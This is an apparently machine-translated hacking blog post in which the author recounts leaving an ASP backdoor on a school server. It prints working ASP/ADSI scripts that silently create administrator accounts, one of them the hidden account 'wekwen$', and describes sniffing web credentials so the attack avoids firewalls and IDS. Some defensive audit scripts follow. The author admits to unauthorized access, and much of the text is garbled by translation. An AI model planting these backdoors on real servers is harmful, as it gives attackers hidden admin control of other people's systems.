You don't even think about it.--iis Alternative Backdoor _ Vulnerability Research

Finally by the school into the society, found that in fact, there are many schools are still worthy of our nostalgia, and work is actually very hard, the most important thing is not often with friends to play online. Back to the school in Saturday, in the main room and do network management friends Chat, accidentally found a very familiar ASP program in the server's Web site directory (formerly I was a member of the School Network group), so even the next look, did not give anonymous browsing permission, but the account tick is to remember the password, login success. The Web page displays "Add Test2 user succeeded", "add test2 admin succeeded". Oh, I don't even know the password of the administrator. Open 3389, ask a friend to see the next user list ...
"Why is it that you guys don't get any good every time you come?" Come on, what are you doing this time? ”
Down You don't worry, in fact, just a previous ASP Trojan did not delete it. ”
Friends do not believe that open the ASP Trojan special killing tools to search for some, but also checked the next ASP page ClassID value, and opened a new version of the Norton Scan all the disk ... When it's over, ask me, where's your trojan? I open the page and show him the code. "Halo, you this is what Trojan Ah, cmd did not, FSO also did not, even encryption also did not add, just a few code ..." This is a long sentence ...
There are two problems in previous versions of IIS. First, there is a lack of a clear, open Interface for Third-party management products and an automated programmable interface for custom routine management tasks; second, a mechanism for controlling directory services to enable servers on the network to discover each other is needed. If these interfaces exist, site creators can use various types of tools to write various types of server management applications, such as the ability to create programs for performance management, installation, and configuration in addition to user management and security products. Microsoft published a new version of the Active Directory Service interface (Active Directory Serviceinterfaces,adsi) earlier in 1998. ADSI and the IIS Management Object (IIS administration Object,iisao) provide a federated solution to control the directory service and IIS themselves.
Iisao can be accessed by applications compiled in many different languages, including C + +, Delphi, Java, and VB. In addition to rapid growth, third-party site management tools can be better attached to IIS and directory services through ADSI and Iisao. Alternatively, Iisao can be accessed through a Web page via a server-side scripting engine and an Active server page,asp. In fact, if you are using an HTML version of IIS 4.0 or more administrative tools, you are already using Iisao. Iisao can also be accessed from the command line using the Windows Scripting Host (Windows Scripting Host,wsh).
Like Iisao, ADSI is just a set of COM objects that encapsulate objects in their respective directory services. This creates an abstraction layer in the local directory service and application, so site creators can control many different directory services through a single public interface. With this powerful Active Directory service interface, we can create full access to local or remote host Administrator privileges on the Windows NT platform, and some of the previous articles on scripting attacks have been used in this area.
For example, we want to see the service on the remote machine (ready PsKill, stop the firewall first), the code is as follows:
<%set computerobj = GetObject ("winnt://127.0.0.1")
Computerobj.filter = Array ("Service")
For each Service in ComputerObj
Response.Write "Service Display name =" & Service.displayname
Response.Write ("<BR>")
Response.Write "Service Account name =" & Service.serviceaccountname
Response.Write ("<BR>")
Response.Write "Service executable =" & Service.path
Next%>
Returns results after execution.
What do you think? The service is all out, right? Even the services corresponding to the path are available, than the Task Manager is also useful. "You seem to have not made it clear what you just did?" "OK, in fact, the school server on the ASP program code is also very small, from the add account to enhance the permissions of only more than 10 lines:
<%
Set onlineserver= GetObject ("winnt://127.0.0.1")
Set newuser= onlineserver.create ("User", "test2")
Newuser.setpassword "Test2"
Newuser.fullname= "Test2 test"
newuser.description= "TestUser"
Newuser.setinfo
Set odomain = GetObject ("winnt://" & "127.0.0.1")
Set ogroup = Odomain.getobject ("Group", "Administrators")
Ogroup.add ("Winnt://test2")
Response.Write "Add Test2 User succeeded"
Response.Write "Add test2 Admin succeeded"
Set odomain=nothing
Set ogroup=nothing
%>
Let's see the effect.

View the current machine all accounts can use the following code:
Set onlineserver= GetObject ("winnt://127.0.0.1")
Onlineserver.filter=array ("User")

For all in Onlineserver
Response. Write Member.name & "--" & member. FullName & "<br>"
Next
Set onlineserver= GetObject ("winnt://127.0.0.1")
：
In other words, in the Web site permissions to enhance the use of this is not very useful, can only be used in special circumstances to the server authority to cause effective attacks, the network has friends wrote a paragraph such code: <% @codepage =936%><%response.expires=0
On Error Resume Next
Session.timeout=50
server.scripttimeout=3000
Set Lp=server.createobject ("Wscript.Network")
oz= "winnt://" &lp.computername
Set Ob=getobject (oz)
Set oe=getobject (oz& "/administrators,group")
Set od=ob.create ("User", "wekwen$")
Od. SetPassword "Wekwen" <-----password
Od. SetInfo
Set of=getobject (oz& "/wekwen$,user")
Oe. Add (Of. ADsPath)
Response.Write "WEKWEN$CONTENT$NBSP, Super Account build Success!" %>
Said it is a new vulnerability to the normal user to upgrade the administrator, but I have been tested to find no success, in the Non-mainstream attack method is generally used in this way: it is not required password account to browse it? You can sniff each other's Web Connection account in the target segment first, because by default the Web account and password are completely transparent when they are delivered! And then with some of the permissions have been inserted into this type of ASP Trojans to the server infiltration (here refers to the special situation, who want to think with the account password on the invincible words I have no way, I now just say special circumstances, the advantage is to avoid firewalls and IDs interference. The general server uses cmd.asp to fix it, need not be so troublesome.
"Wow, it's so dangerous, delete it, delete it." "Friends brush the mouse, put my program to kill, I see nothing, said the individual is ready to go back."
"Stop, what if someone else uses this to sabotage?" The friend pulled me to ask. "In fact, the protection method is very simple, that is, to restore anonymous access," said a friend of the export of a huge Oxford dictionary ready to be photographed, I can only continue to say.
If you have to use this type of access, you can write some of the ASP code to fight against, for example: The following is returned to the local Administrators group on the computer all members, you can add automatic refresh, a discovery of the intrusion to jump out of a dialog box good:
Set objnetwork = CreateObject ("Wscript.Network")
StrComputer = Objnetwork.computername
Set Objgroup = GetObject ("winnt://" & StrComputer &
"/administrators,group")
For each objuser in Objgroup.members
Response.Write Objuser.name
Next
Discover code that is not deleted by the local Administrator user account and domain Administrator account (not the administrator):
Set objnetwork = CreateObject ("Wscript.Network")
StrComputer = Objnetwork.computername
Set Objgroup = GetObject ("winnt://" & StrComputer &
"/administrators,group")
For each objuser in Objgroup.members
If objuser.name <> "Administrator" and Objuser.name <> _
"Work\administrator" Then
Objgroup.remove (Objuser.adspath)
End If
Next
A script that reports the status of the Guest account on the local computer:
Set objnetwork = CreateObject ("Wscript.Network")
StrComputer = Objnetwork.computername
Set objuser = GetObject ("winnt://" & StrComputer & "/guest")
If objuser.accountdisabled Then
Response.Write "Guest account not in use."
Else
Response.Write "Guest user is used."
End If
Check to see if any files on your computer are shared:
StrComputer = "."
Set objWMIService = GetObject ("winmgmts:\\" & StrComputer &
"\root\cimv2")
Set colshares = objWMIService.ExecQuery ("SELECT * from Win32_Share")
For each objshare in Colshares
Response.Write "Name:" & Objshare.name
Response.Write "Path:" & Objshare.path
Response.Write "Type:" & Objshare.type
Next
"That's all you got?" I think it's nice to write an IIS back door with it, I have to study it. Tomorrow is Sunday, you mustn't go, help me on duty! ", God, again all night to see the computer room, my brother my weekend Ah!"